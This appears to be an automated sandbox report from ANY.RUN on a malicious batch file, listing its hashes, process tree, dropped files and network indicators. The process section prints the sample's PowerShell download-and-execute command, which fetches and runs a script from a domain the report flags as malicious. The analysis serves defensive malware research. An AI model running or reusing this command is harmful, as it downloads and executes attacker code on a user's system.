analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

bat.bat

Full analysis: https://app.any.run/tasks/50b8b437-24e6-49a2-bf8f-e4537c04f210
Verdict: Malicious activity
Analysis date: July 12, 2020, 20:18:18
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: text/plain
File info: ASCII text
MD5:

D24471870155D32B6EAFD9212E5D0443

SHA1:

824F6453990FB726B130E3B043A7A5672D5BC587

SHA256:

10BBE64B5373541A9CFB4D6AC67A8E16E8A6F31CC1AC962D097BD8BA0311D740

SSDEEP:

3:VSJJLN9f4etmAcLhzAK5DikANQMH4PYv:snR8zD5q/0Yv

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Executes PowerShell scripts

      • cmd.exe (PID: 2268)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2768)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
37
Monitored processes
2
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2268cmd /c ""C:\Users\admin\AppData\Local\Temp\bat.bat" "C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2768powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://pd1zb.nl/files/svchost.bat');"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
283
Read events
216
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
0
Unknown types
0

Dropped files

PID
Process
Filename
Type
2768powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SEWLB01TX5ERWC7FSVTY.temp
MD5:
SHA256:
2768powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF1688bc.TMPbinary
MD5:1E90447D6420E49907C88DAEEC8BED05
SHA256:9FE71CFB47F0331094D9EF67424CBE92C8C52B7CBCE21ED256020E30E2A758C5
2768powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:1E90447D6420E49907C88DAEEC8BED05
SHA256:9FE71CFB47F0331094D9EF67424CBE92C8C52B7CBCE21ED256020E30E2A758C5
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2768
powershell.exe
109.237.221.83:443
pd1zb.nl
Mihos
NL
malicious

DNS requests

Domain
IP
Reputation
pd1zb.nl
  • 109.237.221.83
malicious

Threats

No threats detected
No debug info